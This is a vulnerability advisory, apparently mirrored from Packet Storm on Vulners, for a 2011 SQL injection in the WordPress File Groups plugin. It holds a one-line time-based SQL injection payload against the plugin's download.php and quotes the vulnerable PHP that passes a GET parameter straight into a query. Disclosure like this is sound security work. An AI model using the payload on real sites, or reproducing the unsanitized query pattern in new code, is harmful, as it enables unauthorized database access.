Lucene search
K

WordPress File Groups 1.1.2 SQL Injection

🗓️ 18 Aug 2011 00:00:00Reported by Miroslav StamparType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

WordPress File Groups 1.1.2 SQL Injection Vulnerability 2011 Miroslav Stampa

Code
`# Exploit Title: WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability  
# Date: 2011-08-17  
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)  
# Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip  
# Version: 1.1.2 (tested)  
  
---  
PoC  
---  
http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121)))  
  
---------------  
Vulnerable code  
---------------  
$fgid = $_GET['fgid'];  
  
...  
  
$file_list = $wpdb->get_col("select guid from wp_posts where post_parent = $fgid");  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation